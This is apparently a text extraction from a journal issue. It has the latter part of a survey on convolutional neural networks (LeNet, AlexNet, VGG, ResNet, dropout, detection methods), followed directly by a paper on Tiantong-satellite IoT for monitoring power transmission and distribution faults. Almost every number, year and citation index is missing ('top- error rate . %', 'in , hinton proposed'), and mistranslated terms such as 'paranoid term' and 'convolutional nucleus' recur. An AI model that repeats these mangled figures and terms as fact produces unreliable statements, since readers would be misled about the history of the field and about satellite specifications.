bp algorithm proposed by rumelhart in [ ].in the s, lecun proposed the lenet- model[ ], which was mainly applied to image classification of handwritten numbers, used the stochastic gradient descent method and reverse propagation method for supervised training of the cnn, and achieved the best recognition results on the mnist dataset[ ], laying the foundation of modern cnn in , hinton proposed the concept of deep learning in his paper and pointed out that multi-cryptic neural networks have better feature learning capabilities and their complexity in training can be effectively mitigated by layer-by-layer initialization[ ]. in the next few years, the development of cnn has also had some achievements, thanks to the substantial update of computer hardware devices and the rapid development of gpu.in , the imagenet competition, the model based on cnn took the first place with a % accuracy rate higher than the second place, and was once again pushed to the deep research boom by scholars.in , the computer vision group of oxford university and google deepmind jointly developed vggnet[ ], and won the first and second place in the imagenet competition respectively.in , kaiming he et al. proposed the residual neural network resnet[ ], which solves the problem of deep networks being difficult to train by fitting the residual term with cross-layer connections.although the number of network layers reaches , the complexity is lower and the top- error rate on imagenet is only . %. b basic structure and working principle the basic building blocks of a cnn are also neurons one by one, containing weights with learning abilities and paranoid term constants. when multiple neurons are combined with a hierarchical structure, a neural network model is formed. a figurative representation of both is shown in figure . international journal of advanced network, monitoring and controls volume , no. , (a) neurons (b) neural networks figure . neurons and neural networks. cnnmodels, are neural network modelsthat contain feature extractors consisting of convolutional and pooled layers. a typical network structure is shown in figure , which includes five parts: input layer, convolution layer, pooling layer, full connection layer, and output layer. among them, the convolutional layer and the pooling layer are the core modules to realize the feature extraction function of convolutional neural networks. figure . typical structure of a cnn cnn is a multilayered supervised learning neural network structure with the following workflow: a series of pre-processing operations are performed on the data at the input level, such as data normalization, de-normalization, etc. entering the convolutional layer, the image of the input layer is convolved with a convolutional nucleus, and then the activation function outputs a feature extraction diagram of the layer, which is expressed as ( ). ∑ ( ) wherein, represents theactivation function, represents the set of images participating in the current convolutional layer operation, represents the value of a certain pixel input to the current layer image, represents the convolutional operation, represents the weight vector of the l layer convolutional nucleus, and represents the paranoid term of the l layer. currently the commonly used activation functions are: sigmod function, tanh function, relu function, etc[ ]. connecting the pooled layer after the convolutional layer allows a certain degree of feature invariance and can reduce the amount of data. the input feature map is split into non-overlapping regions in the layer, and for each subregion features are further extracted by pooling operations, the common pooling operations being average pooling and maximum pooling. after a number of alternating convolutional and pooling layers, multiple sets of highly abstracted feature maps are obtained; then the fully connected layers are entered and the multiple sets of feature maps are combined into one feature map. then based on business needs, the final output of classification or identification results. the goal of training is to minimize the loss function of the network, so the weights and biases of each layer need to be constantly updated during the training. common loss functions are mean squared error (mse) function, negative log likelihood (negative loglikelihood, nll) function, etc. in practice, in international journal of advanced network, monitoring and controls volume , no. , order to reduce the occurrence of overfitting, the loss function increases the l parametre to control the overfitting of the weights and the parameters to control the strength of the overfitting effect.  ( ) the weights and biases were updated as ( ) and ( ). ( ) ( ) c significance of the study cnnhave been so successful in a number of applications and researchers have moved on to other areas, which brings more challenges. in terms of the cnn itself, that's where the research comes in. ) refinement of the theoretical system through domain application effects. cnn have undergone more than years of bumpy development, from mp models, bp neural networks, to various deep learning networks that are popular nowadays, all of them are judged directly by experimental effects, and there has been no complete set of theories for mathematical verification of these methods. thus, as the field of application of cnn expands, it will also promote theoretical research in the field of cnn to a certain extent. ) facilitate the optimization of neural network structures and extend their application value. at present,cnn have a place in natural language processing, image recognition, speech processing and other fields, and theirtrend is positive. and the network still has the problem of gradient disappearance, training sample size limit, computing power limit, is the short board of its development. for the problem that networks are difficult to train, an analysis of the problems related to network training is also given in the literature[ ], but the solutions given have not become mainstream. therefore, there is an urgent need to improve the learning capabilities of deep neural networks, so that the networks have better generalization capabilities and can be adapted to more complex application scenarios. iii. improvement and optimization of cnn in recent years, improvements in cnn have been driven primarily by factors such as final detection effectiveness, network operating efficiency, and computational complexity. as of now, the improvement and optimization of cnn are mainly considered in three aspects: network depth, network structure, and network training methods. a network depth lecun et al. designed the lenetnetwork[ ], which uses alternately connected convolutional and pooled layers, and eventually passes through full-connected layers.there is layers in lenet and lenet became the originator of cnn.in , krizhevsky proposed alexnet[ ], a network model with five convolutional layers, some of which are followed by a pooled layer for downsampling and finally two fully connected layers. the last layer is the softmax output layer, with nodes, corresponding to image classifications in the imagenet graph set and using the dropout mechanism and relu function, which has improved the accuracy and training time. subsequently, the vggnet proposed by karen et al. uses almost all × convolutional nuclei, while adding pooled layers after several convolutional layers, instead of pooling immediately after each convolutional layer, to guarantee the depth of the network in many ways.vggnet[ ]demonstrated that increasing the number of network layers is beneficial for improving the accuracy of image classification. this increase is not unlimited and too many layers can create network degradation problems. the number of layers that affect the test results vggnet was finally determined in two international journal of advanced network, monitoring and controls volume , no. , versions, and layers. in the following years, there were different teams of researchers who proposed googlenet ( layers), resnet ( layers) and they all deepened in terms of network depth and got better and better. in terms of network depth alone, increasing the network level has an effect on the learning effect of convolutional neural networks, which also confirms the need for deeper learning. b improvements of the network structure improvements to the network structure mainly revolve around the idea of reducing network complexity. in , google proposed googlenet[ ], whose main innovation is the inception mechanism, which sets up different convolutional cores in the same layer, i.e., multi-scale processing of images, and adding * convolutional core before * , * for dimensionality reduction, which reduces parameters and improves the accuracy of image recognition on imagenet datasets by about %.in , springenberg j t et al. proposed a full convolutional structure in literature[ ]. instead of the classical pairing of alternating convolutional and pooled layers in a classical convolutional neural network, the stride convolutional layer is used instead of the feature extraction layer in this structure. it was found that the error rate of this new network structure was reduced by percentage points compared to traditional convolutional neural networks, and it was found that in some cases, the addition of apooling layer to this network structure resulted in weakened performance. lin m et al. proposed a network-in-network structure in the literature, network in network[ ]. is a subversion of the traditional structure of convolutional neural networks. the mesh structure replaces the full connection layer with a global averaging pooling layer, allowing the input feature map to be classified directly at the output, improving performance. however, this structure makes the convergence process longer and, on the whole, is not a very effective network structure. the google deepmind team proposed a self-contained transformation module to flexibly and efficiently extract image invariant features[ ], the specific structure of the module is shown in figure , the model named spatial transformer is mainly composed of three parts: localization network, grid generator and sam-pler. localization network uses input feature mapping and outputs spatial transformation parameters through multiple implicit layers; grid generator uses predictive transformation parameters to create sampling grids; sampler uses feature mapping and sampling grid as inputs to generate output mapping from grid points. figure . invariant image feature this model is used to good effect: it is a self-contained module that can be added anywhere in the network structure (not just the cnn), and there are no limits. it is easy to differentiate and can be used directly for end-to-end training. its easy-to-differentiate and fast nature allows it to be added to the structure without slowing down the original network. the features extracted by this method are more common than the conventional structures. shanshan xu[ ] proposed an algorithm for progressively extending the network structure of a convolutional neural network to optimally adjust the network structure to make the network suitable for real-world problems, and at the same time proposed an improved feature extraction method to realize that feature extraction does not occur on its own in the network, and applied this method to handwritten number recognition, and the experimental results international journal of advanced network, monitoring and controls volume , no. , showed that the recognition accuracy and recognition efficiency were higher than other algorithms using the classification method of convolutional neural networks. c methods of network training ) the dropout mechanism[ ] was added to the eliminate overfitting. the dropout proposed by hinton et al. effectively improves the generalization performance of the network by randomly ignoring a certain percentage of node responses during training compared to traditional fully connected neural networks. however, the performance improvement of dropout for convolutional neural networks is not significant, mainly because convolutional neural networks greatly reduce the number of training parameters compared to fully connected networks due to the weight sharing properties of convolutional nuclei, which itself avoids the more severe overfitting phenomenon. based on the idea of dropout, wan et al[ ]proposed the drop connect approach. unlike dropout which ignores some of the node responses of the full connection layer, drop connect randomly disconnects a certain percentage of the neural network convolutional layer. forconvolutional neural networks, drop connect, which acts on the convolutional layer, has a much stronger past-fitting capability than dropout, which acts on the full-connect layer. although the functional layer of dropout and drop connect are different, the underlying principle is to increase the sparsity or randomness of network connections in network training in order to eliminate overfitting and improve network generalization capabilities. ) training methods using knowledge transfer overfitting and gradient dispersion are prone to occur when training against conventional convolutional neural networks. a training strategy using knowledge migration was proposed by rocco et al. in the literature[ ]. pre-training (pre-training with soft target, pst) is first performed on the soft target (soft target is a class distribution containing information between sample classes), and the migration of the soft target from the source model to the target model in the same domain allows more supervisory information to be obtained from a limited sample than from a single tag, solving the problem of missing samples. then the target model adjacent convolutional layer is divided into a module to learn the low-level features of the source model in a modular way, similar to dbn's layer-by-layer pre-training strategy, and the combination of mmt and pst, the sample class information and low-level features of the two knowledge migration at the same time, so that the model convergence to a better position, and then use the sgd algorithm fine-tuning, so that the generalization performance is greatly improved. Ⅳ. application of cnn in image recognition image classification is an image processing technique that identifies different things by the characteristic information given by the image. with the rise of machine learning, automatic image classification techniques have been applied in various development fields. cao used the classical convolutional neural network vgg- as a prototype in the literature[ ], and added a multi-scale sampling layer at the end of the convolutional part, so that the model can input any size of images for training and testing, while reducing the number of neurons in the full connection layer, which improves the training speed of the model while ensuring accuracy, and applies it to the problem of multi-attribute classification of human faces. in the literature[ ], wenxu shi proposed a cnn-based multiscale approach combined with a feature extraction algorithm for reverse convolutional networks (msdcnn) and classified adenocarcinoma pathology images. classification experiments performed on adenocarcinoma pathology cell images showed that the msdcnn algorithm improved the classification international journal of advanced network, monitoring and controls volume , no. , accuracy of the final convolutional feature scale by about % over the conventional cnn algorithm and about . % over the classification accuracy of the fusion network model approach, which is also based on multi-scale features. in the literature[ ], chunlei zhang proposed a parallel network model based on convolutional neural networks for military target image classification. the method uses two edge detection operators to extract the target image features separately and then input them into the convolutional neural network for deep feature extraction, which improves the classification recognition rate by . % and reaches % compared to theconventional convolutional neural network. the theoretical analysis and experimental data illustrate that the model enables the effective differentiation of military target image data and is important for the accurate provision of military operational information. target detection is a fundamental problem in the field of machine vision as well as artificial intelligence, whose main goal is to pinpoint the category and location border information of various targets in an image. target detection algorithms based on convolutional neural networks, such as rcnn, fast rcnn, faster rcnn, mask rcnn, etc., are widely used in security monitoring, intelligent transportation and image retrieval and other fields. a target detection algorithm based on multi-scale feature extraction was proposed by jianghao rao in the literature[ ] and applied to the detection of infrared pedestrian small targets with better results than conventional networks. a mask-rcnn-based method for building target detection was proposed by dajun li et al. in the literature[ ]. in the literature[ ], ding peng "fine-tuned" a variety of mainstream depth convolutional neural networks based on faster rcnn detectors on two classical data sets for target detection of optical remote sensing images. in response to the problem of target detection in traffic roads, zhang qi et al. proposed a traffic target detection method based on anchor point clustering, all-anchor point training strategy and reinforced intersection and merger ratio (siou) in the literature[ ]. Ⅴ. conclusion this paper describes the basic structure of classical cnn from the development of cnn, briefly analyzes the features of cnn that have been improved and optimized in the development process, and finally elaborates on the wide application of cnn in the field of image classification and target detection. cnn have been developed to date and occupy an important position in the field of image recognition. in terms of current trends, cnn will continue to evolve and makecnnsuitable for various application scenarios, such as d cnn facing video understanding. there are also challenges, such as limited data sets, network generalization performance, robustness to be improved, and high training costs. the aforementioned issues will be a direct driver for the future development of convolutional neural networks and will directly contribute to the further deepening of artificial intelligence. acknowledgment this work is supported by the natural science foundation of shaanxi province( jm- ). references [ ] hinton g e, salakhutdinov r r , reducing the dimensionality of data with neural networks[j].science, , ( ): - . [ ] rumelhart d e, hinton g e, williams rj. learning representations by back-propagating errors[j].nature, , : - . [ ] y. lecun, l. bottou, y. bengio, and p. haffner. gradient-based learning applied to document recognition. proceedings of the ieee, november . [ ] lecun y, cortea c. mnist handwritten digit database[eb/ol].http://yann.lecun.com/exdb/mnist, . [ ] k. simonyan and a. zisserman. very deep convolutional networks for large-scale image recognition. [ ] he k, zhang x, ren s, et al. deep residual learning for image recognition[eb/ol].http://arxiv.org/abs/ . , . [ ] gu jiu-xiang, wang zhen-hua, jason kuen,etal. recentadvances in convolutional neural networks. arxiv: . v , . [ ] x. glorot, y. bengio. understanding the difficulty of training deep feedforward neural networks. aistats, international journal of advanced network, monitoring and controls volume , no. , [ ] lecun y, boser b, denker j s, etal. back propagation applied to handwritten zip code recognition[j]. neural computation, , ( ): - . [ ] krizhevsky a,sutskever i,hinton g e.imagenet classifi-cation with deep convolutional neural networks[c]//advances in neural information processing systems, : - . [ ] bengio y,simard p,frasconi p.learning long-term depen-dencies with gradient descent is difficult[j].ieee transac-tions on neural networks, , ( ): - . [ ] christian szegedy, wei liu, yangqing jia, pierre sermanet, scott reed, dragomir anguelov, dumitru erhan, vincent vanhoucke, andrew rabinovich, going deeper with convolutions, arxiv link: http://arxiv.org/abs/ . . [ ] rougui j e, istrate d, souidene w, et al. audio based sur-veillance for cognitive assitance using a cmt microphonewithin socially assistive living [j]. , ( ): - .] [ ] lin, min, qiang chen, and shuicheng yan. network in network. arxiv preprint arxiv: . [ ] zang d, chai z, zhang j, et al. vehicle license plate recog-nition using visual attention model and deep learning[j].journal of electronic imaging, , ( ): . [ ] xv shanshan. research and application of convolutional neural network [d]. nanjing forestry university, . [ ] hinton g e, srivastava n, krizhevsky a, et al. improving neural networks by preventing co-adaption of feature detectors[ R /ol].[ - - ]. http: / / arxiv. org / pdf / . v . [ ] wan l, zeiler m, zhang s, et al. regularization of neural networks using drop connect [c] / / proceedings of the inter-national conference on machine learning. new york: acm press, : - . [ ] luo ke, zhou anzhong,luo xiao. a convolutional neural network training strategy using knowledge transfer[j]. control and decision-making, , ( ) : - . [ ] cao ge. research on face image classification application based on deep convolutional neural network [d]. jilin university, . [ ] shi wenxu, jiang jinhong, bao shengli. application of improved convolutional neural network in pathological image classification of adenocarcinoma[j]. science, technology and engineering, , ( ) : - . [ ] zhang chun-lei. military target image classification technology based on parallel convolutional neural network[j]. electronic design engineering, , ( ) : - . [ ] rao jianghao. target identification, positioning and detection based on cnn integration [d]. university of chinese academy of sciences (institute of optoelectronic technology, chinese academy of sciences), . [ ] li dajun, he weilong, guo bingxuan,li maosen, chen minqiang. building target detection algorithm based on mask - rcnn[j]. science of surveying and mapping, , ( ) : - . [ ] dingpeng. research on optical remote sensing target detection technology based on deep convolutional neural network [d]. university of chinese academy of sciences (changchun institute of optics, precision mechanics and physics, cas), . [ ] zhang qi, ding xintao, wang wanjun, szhou wen. traffic target detection method based on faster rcnn [j]. journal of west anhui university, , ( ) : - . http://www.elecfans.com/tags/pi/ http://arxiv.org/abs/ . international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - internet of things application in satellite communication in power transmission, transform and distribution dong chuang shaanxi huabiao network technology co., ltd. xi’an, , china e-mail: james @ .com abstract—in the national grid enterprise system, the geographical environment of transmission, substation lines and equipment distribution is very complicated. transmission lines and substation equipment built in complex environments such as plateaus, forests, canyons and borders are often subjected to earthquakes, floods and blizzards. the threat of mudslide disasters, the ground communication network is greatly affected by extreme natural disasters, and it is impossible to repair and rescue in time when disasters occur. in response to the needs of facility operation and maintenance under emergency anomalies, tiantong no. satellite is a communication satellite with independent intellectual property rights in china. it has functions such as voice communication, image transmission, positioning, and data reporting. it can set up satellite internet of things to realize real-time monitoring and equipment. conveniences such as inspections and emergency rescues reduce the operation and maintenance costs of the power transmission and transformation process. keywords-tiantong satellite; audio and video transmission; inspection; satellite ground station; ground network i. introduction the ubiquitous electricity internet of things connects people , things and power users , power grid enterprises ,power generation enterprises , suppliers and their equipment to generate shared data for users, the grid, power generation, and suppliers and government social services; use the power grid as a hub, play a platform and sharing role, create value for the development of the industry and more market players, and provide value services. the essence of the ubiquitous electric power internet of things is to fully apply modern information technologies such as "big data, cloud platforms, the internet of things, mobile internet, artificial intelligence" to create a smart service system with comprehensive status perception, efficient information processing, and convenient and flexible application in january , the state grid first proposed the strategic goal of “three types (hub type, platform type, shared type) two networks (strong smart grid, ubiquitous electricity internet of things)” in the “two sessions” report, and proposed the construction the important material foundation of a world-class energy internet company is to build and operate the "two networks." in march , the state grid clarified the definition of the ubiquitous electric power iot for the first time at a teleconference on the deployment of ubiquitous electric power iot construction work, and proposed a two-phase strategic arrangement for the construction of the next five years. the most urgent and important task is to accelerate the construction of the ubiquitous electric power internet of things. at present, a large number of devices and applications have been developed in the application layer, platform layer, network layer and perception layer. such iot devices have been deployed in areas covered by terrestrial networks with stable business international journal of advanced network, monitoring and controls volume , no. , capabilities and reasonable use costs. the development of services in areas without ground network signal coverage urgently needs to be improved, and current ground network and iot equipment cannot support this demand. due to the characteristics of the satellite network: covering no dead zones, communication distance has nothing to do with cost, convenient networking, safe and reliable communication, and can be used as a last-guaranteed communication method in the event of ground network paralysis caused by earthquakes, floods, and snowstorms, particularly suitable as a supplementary application in the power industry. the ubiquitous electric power internet of things-related services, in areas where there is no ground network signal coverage, or where new ground networks cover higher cost areas, the most effective technical implementation is achieved by satellite communications using satellites as relays. ubiquitous power satellite iot solution. the application of satellites to electricity is accompanied by the rapid development of satellite networks, combined with the objective communication needs of the power industry in areas without ground network coverage. the ubiquitous power satellite iot will be an extension and supplement of the ubiquitous power iot. add satellite communication capabilities on the basis of existing power iot equipment to ensure that it meets the needs of power applications and expands the use of locations and scenarios. in short, it extends from areas with terrestrial networks to areas without ground network coverage. this article will analyze the application of ubiquitous power satellite iot in the power system's power generation, transmission, substation distribution and power consumption process. ii. overview of satellite communications iot technology support a. satellite communications overview satellite mobile communication refers to the use of artificial earth satellites as relay stations to forward radio waves used for communication between mobile users or between mobile users and fixed users to achieve mobile communication between two or more points. satellite communications generally use the l, s, c, x, ku, and ka frequency bands, while high-throughput satellites generally use the c, ku, and ka frequency bands. however, resources in the c and ku frequency bands are tight, so currently qualcomm satellites are increasingly the development of ka band, the frequency resources of ka band are more abundant. typical satellite mobile communication systems include space segment, ground segment and user segment. the space segment is composed of one or more satellite constellations. as a communication relay station, it provides the connection between the network user and the gateway. the ground segment usually includes the gateway, the network control center, and the satellite control center. operation; the user segment is composed of various user terminals. there are mainly two types of terminals-mobile terminals and handheld terminals. new satellite technology has developed rapidly, and there are many mature commercial systems, such as tiantong, high-throughput, iridium, etc. there are also many satellite newcomers who will launch thousands of satellites and put them into operation in the next few years. figure basic composition of international journal of advanced network, monitoring and controls volume , no. , satellite. figure . basic composition of satellite communication link b. satellite communication applications mobile satellite communications are an effective complement to terrestrial cellular mobile communications. in addition to the characteristics of mobile communications, it also has the inherent advantages of satellite communications, including: ① long communication distances, large coverage areas, and multi-address connectivity. a geosynchronous orbit communication satellite can cover % of the earth's surface. the large communication distance between two points on the ground is about km, and all earth stations in the area covered by the satellite can use the same satellite to communicate with each other. ② large communication capacity and many types of transmission services. typical communication satellites have a capacity of tens to hundreds of megabits per second and can serve hundreds of video channels or tens of thousands of voice and data links. ③ good communication quality and low line bit error rate. since the radio waves of mobile satellite communications mainly propagate in the space beyond the atmosphere, the propagation characteristics are relatively stable, and they are not easily affected by natural conditions and interference. the normal operating rate of satellite communications is above . %, and the transmission quality is high. ④ the "on-the-move communication" of the mobile platform can be realized. diverse users of mobile satellites, satellites terminals can be mobile carriers located on the ground, at sea, in the air or even in space. it is combined with terrestrial cellular mobile communication systems and other communication systems to form a global coverage seamless communication network. in addition to the above advantages, satellite mobile communication also has the following constraints: ① the size, weight and power consumption of mobile terminal equipment are limited, the size and shape of the antenna are limited by the installed carrier (such as aircraft, cars, ships, etc.), handheld terminals the requirements are even more demanding. ② the satellite antenna beam should be able to adapt to changes in the ground coverage area and keep pointing. the antenna beam of the user's mobile terminal should be able to keep pointing to the satellite as the user moves, or an omnidirectional antenna beam. ③ due to the movement of the mobile body, when the link between the mobile terminal and the satellite transponder is blocked, a “shadow” effect will occur, causing communication to be blocked. ④ a satellite constellation system composed of multiple satellites requires the establishment of inter-satellite communication links and on-board processing and on-board exchanges, or the establishment of a gateway station with exchange and processing capabilities. c. development status of satellite communication system ) tiantong satellite the tiantong- satellite mobile communication system is composed of a space segment, a ground segment and a user terminal, and the space segment is planned to consist of multiple geosynchronous orbit communication satellites. as the first star of china’s satellite mobile communication system, tiantong- was launched on august , . it belongs to china international journal of advanced network, monitoring and controls volume , no. , satellite communications group co., ltd. it is mainly developed by china academy of space technology and uses new plastic antennas. new equipment and technologies such as stand-alone integrated technology, the communication frequency is designed in the s band, and the cellular technology with a bandwidth of mhz can form hundreds of spot beams. the signal transmission loss is small and the communication quality can be effectively guaranteed. at the same time, it uses communication satellite frequency multiplexing technology and a large-scale expandable antenna on board, which greatly improves the sensitivity of satellite receiving signals and increases the capacity of satellite communications. the area covered by the star of tiantong no. is mainly china and its surroundings, the middle east, africa and other related regions, and most of the pacific ocean and the indian ocean. there are no restrictions on the coverage of the terrain, and the ocean, mountains, shangyuan, forests, gobi, and desert can be seamlessly covered. covers all types of mobile users including vehicles, airplanes, ships, and individuals. it provides all-weather, all-day, stable and reliable mobile communication services for various fields such as personal communications, marine transportation, ocean fishing, aviation rescue, and tourism research. when natural disasters occur in voice, short message and data services, the emergency communication capabilities of tiantong one can play a great role. in addition, the main advantages of tiantong one are reflected in the miniaturization and mobile phone of the terminal, which is easy to carry. the ground service of tiantong no. is operated by china telecom corporation, which will form a mobile communication network with ground mobile communication systems, and provide voice and data communication coverage for various handheld and small mobile terminals in china's land and surrounding sea areas. it is understood that china telecom has launched an operation and plans to launch a mobile phone with mobile satellite communication capabilities. even if it reaches the end of the earth, you can use it to talk to family and friends, send text messages, chat on wechat, and communicate with video. figure . tiantong- satellite mobile communication system international journal of advanced network, monitoring and controls volume , no. , it is estimated that by , china ’s mobile communication satellite system will have more than million end users, and its services will cover disaster relief, personal communications, marine transportation, ocean fishing, air passenger transport, bipolar scientific research, and international peacekeeping. during this period, we will also launch multiple tiantong- satellites to further increase the satellite mobile communication service capacity and coverage area, and expand from the surrounding areas of china to form a regional mobile communication system integrating satellite and ground integration to achieve satellite mobile communication. large-scale application and operation build an important support platform for the country's 'belt and road' strategy. ) iridium satellite . the iridium satellite system was the first leo satellite cellular system with global coverage. it was launched by motorola in the late s and developed in the early s. the "iridium" star system includes space segment, ground segment and user segment[ ]. the networking and coverage are shown in figure . space segment the initial design of the constellation consisted of leo satellites, evenly distributed in polar orbits, and all satellites were moving in the same direction. it is similar to the electrons of iridium orbiting the nucleus, hence the name of the system. the actual constellation consists of satellites distributed on circular near-polar orbital planes with an inclination of . °, with an interval of ° and an orbital height of km. each satellite provides spot beams, forming cells on the ground. at a small elevation angle of . °, the diameter of each cell is km, and the coverage area of each satellite is approximately km. the constellation forms seamless cellular coverage on the global ground. one spot beam of each satellite supports channels, a single satellite can provide channels. it was officially operated on november , . at present, it has more than . million users and uses low-orbit satellites to cover the world. the characteristics are low orbit, fast transmission speed, small information loss, and greatly improved communication quality. the ground receiving station, equipment is miniaturized, and it is interconnected with the ground network, which makes the communication in the uninhabited, barren land, remote areas with backward communication, and the scene of natural disasters unobstructed. figure . iridium satellite system international journal of advanced network, monitoring and controls volume , no. , ) high throughput satellite the "practice no. " satellite first applied ka-band broadband technology to china's communication satellites, with a total communication capacity of gbps, exceeding the total capacity of communication satellites developed and launched in china, marking that china's satellite communications has entered a high-throughput era at the same time, the "thirteenth practice" satellite carried out the first international two-way laser communication test between high-orbit satellites and the ground, with a speed of up to gbps, which established china's global leading position in the field of high-speed space information transmission. the "thirteenth" satellite is china's first electric propulsion satellite. compared with conventional chemical propulsion satellites, its launch weight is greatly reduced, which reduces the requirements for the carrying capacity of the launch vehicle. the amount of data will no longer be a constraint on the life of the satellite, and the design life of the communication satellite will generally exceed the current -year limit and reach to years. the "practice no. " satellite will mainly provide services for users in china and other regions. it can realize the access of mobile communication base stations in remote areas and be used in the fields of enterprise private networks, distance education, medical treatment, digital news gathering and emergency communications. at the same time, the star can facilitate users to quickly access the network, download and return rates up to mbps and mbps, which can effectively meet the needs of passengers on the high-speed vehicles such as aircraft, high-speed rail to access the internet anytime, anywhere. high-throughput satellites are an important part of satellite communications and broadcasting systems in china's integrated space-ground information network. they are an effective complement to terrestrial communication systems and can be widely used in areas where terrestrial communication systems are difficult to cover or where construction costs are high. after the completion of the “global coverage, on-demand access, on-demand services, safe and trustworthy” integrated information network in the world, china will have global space-time continuous communication, highly reliable and secure communication, regional large-capacity communication, and high-mobility full-range information transmission. and other capabilities to meet national strategic needs such as expanding national interests, safeguarding national security, safeguarding national economy and people's livelihood, and promoting economic development. in view of the strategic significance of high-throughput satellites in the space and information fields, china will continue to deploy ultra-high-capacity high-throughput satellites. it is expected that by , it will form a communication capacity that can cover the entire territory of china and the asia-pacific region with a capacity of nearly gbps. to meet the urgent needs for broadband communications in the construction work of "broadband china" and the country's "belt and road", the relevant industrial chain is expected to usher in rapid development. ) 'hongyan' project construction goal: "communicate and connect everything, the world will never lose touch" it is planned to invest billion yuan in low-orbit satellites. the first test star was launched on december , . the backbone constellation system is expected to be built in . its satellite data exchange function can provide two-way, real-time data transmission worldwide, as well as multimedia data services such as short messages, pictures, audio, and video. after the system is completed, services such as intelligent terminal communications, internet of things, mobile broadcasting, navigation enhancement, aviation and maritime surveillance, and broadband internet access will be launched. the system has a international journal of advanced network, monitoring and controls volume , no. , global real-time communication capability under all-weather and full-time terrain conditions. ) 'hongyun' project china aerospace science and industry plans to launch satellites. the satellites will be networked in orbits , kilometers above the ground to build a space-borne broadband global mobile internet network. the first test star was launched on december , . the entire hongyun project is divided into three phases. the first phase is to launch the first star at the end of ; the second phase is to launch four business test stars at the end of the "thirteenth five-year plan", or before the end of ; the third stage is to "ten in the middle of the th five-year plan period, around , satellites will be launched, and the construction of the heaven-earth integration system will be completed initially, with full operating conditions. after the entire plan is completed, it will realize internet access at anytime, anywhere, on the “belt and road” and even globally, and achieve a high-speed, high-quality internet / iot application experience. ) oneweb of united states one web plans to deploy small satellites in low-earth orbit to form an internet satellite network, enabling users around the world to connect to satellites and access g, lte, g, and wi-fi networks through small, low-cost user terminals. it is characterized by multiple satellites, interconnection with the internet, and a single ground terminal download rate of mbps. ) spacex of united states spacex starlink: , low-earth orbit satellites not exceeding kilometers in height (launch of microsat- a and microsat- b in early ) iii. application of satellite communication in the process of power transmission, transformation and distribution a. transmission fault monitoring system the transmission fault monitoring system, consisting of tower poles, sensor cluster, satellite wireless transceiver, power monitoring center, and mobile phone of the responsible person, to realize the status monitoring, information reporting, and fault early warning of the transmission line. the transmission fault monitoring system is a supplement to the online monitoring system of the entire smart grid transmission line. by using satellite technology, it provides strong support in areas that cannot be covered by existing monitoring systems. the business capability is increased to realize the visual real-time monitoring and fault early warning of various states of the transmission line without the coverage of the ground network. the monitoring of the status of important electrical devices on the tower pole, such as circuit breakers, load switches, section switches, and other switch monitoring and fault early warning on kv lines. the logic diagram of the high-level scheme of the transmission fault monitoring system is shown below: figure . the logic diagram of the high-level scheme of the transmission fault monitoring system international journal of advanced network, monitoring and controls volume , no. , the description of each part of the transmission fault monitoring system is as follows: satellite stu: it acts as an information transmission channel, and is particularly suitable for routine monitoring scenarios in areas without ground network coverage and disaster prevention and relief scenarios in areas without ground network coverage. power monitoring center: it is the existing monitoring center of the power system, not a newly deployed system platform, in order to save customers' capital investment budget to the greatest extent. responsible person's mobile phone: when an important failure occurs, the corresponding responsible person's personal mobile phone is notified by sms to speed up the progress of failure handling and reduce accident losses. of course, the level of important faults and the mobile phone number of the person in charge can be set before the implementation of the plan, which will not cause excessive sms business and bring unnecessary pressure on the responsible person sensor clusters: the main business capabilities realized in the entire scheme, that is, the types of transmission line status collection, depend on the configuration of the sensor clusters. b. distribution fault monitoring system transformer fault monitoring system, consisting of tower poles, sensor clusters, satellite stu, power monitoring center, and mobile phone of the responsible person, realize the status monitoring, platform docking, information reporting and fault early warning of distribution and transformation links. the power distribution fault monitoring system is a solution to the fault monitoring and early warning requirements of physical nodes in the power distribution and transformation business that need to increase communication support. conventional equipment on the ground network can partially address these needs, but cannot guarantee emergency communications during natural disasters. the terminal equipment stu used in the power distribution fault monitoring system is a combination of terrestrial network dtu, terrestrial network ttu, and satellite terminal technology, which can improve the reliability in the process of power distribution and transformation. considering the cost of satellite service, it is recommended to construct and install it in important substations and distribution stations, but not in ordinary stations. figure . the logic diagram of the high-level scheme of the distribution fault monitoring system satellite stu: it acts as an information transmission channel, and is particularly suitable for routine monitoring scenarios in areas without ground network coverage and disaster prevention and relief scenarios in areas without ground network coverage. power monitoring center: it is the existing monitoring center of the power system, not a newly deployed system platform, in order to save customers' capital investment budget to the greatest extent. responsible person's mobile phone: when an important failure occurs, the corresponding responsible person's personal mobile phone is notified by sms to speed up the progress of failure handling and reduce accident losses. of course, the level of important faults and the mobile phone number of the person in charge can be set before the implementation of the plan, international journal of advanced network, monitoring and controls volume , no. , which will not cause excessive sms business and bring unnecessary pressure on the responsible person the satellite mobile communication system can quickly form an emergency communication network in an emergency area without relying on the original communication network, enabling the field headquarters and the command center to quickly establish communication links, and provide a certain bandwidth transmission rate, while transmitting voice, images, and data and other information, supporting real-time transmission of multi-directional dynamic images, high-definition video conferences, etc. therefore, the use of satellite mobile communication means can realize emergency communications support for emergency rescue and disaster relief in large-scale disasters and meet the requirements of "all-weather, whole-process, all-round" emergency communications support, which is the future development trend of emergency communications. iv. conclusion in the event of a very catastrophic disaster such as a blizzard, hurricane, earthquake, mudslide, etc., public communication network facilities may be catastrophically damaged and paralyzed. at this time, the communication of the emergency report and rescue command is urgent, which is convenient for effectively monitoring the field power transmission and transformation facilities, and at the same time, it can achieve rapid and effective rescue in the event of a disaster. the monitoring program uses china’s tiantong satellite with independent intellectual property rights to establish a remote monitoring system for power transmission and transformation facilities based on the internet of things of satellites. this system has high security and anti-interference, and can effectively solve remote monitoring of the wild environment. , data communication, positioning and other problems, to facilitate better operation and maintenance of power transmission and transformation facilities, reduce the failure rate of facilities, improve accident repair capacity, rescue timeliness and power supply reliability. references [ ] lv ziping, liang peng, chen zhengjun. development status and trends of satellite mobile communications[j]. satellite application, ( ): - . [ ] liu yue. review on the development of geo mobile communication satellite technology[j]. international space, ( ): - . [ ] xu feng, chen peng. development progress and trends of foreign satellite mobile communications[j]. telecommunication engineering, , ( ): - . [ ] he shanbao. inmarsat system and its new development[j].space international, ( ): - . [ ] andrew d s, paul s. utilizing the globalstar network for satellite communications in low earth orbit[c]. th aiaa aerospace sciences meeting, : - . [ ] huang huashan. application and development of satellite mobile communication[j].china high-tech enterprises, ( ): - . [ ] ma chong, zuo peng, wang zhen-hua. inmarsat system and its application in emergency[j]. satellite application, ( ): - . [ ] zhu lidong. review on development and new technologies of military satellite communications aboard[j].radio communications technology, , ( ): - . [ ] 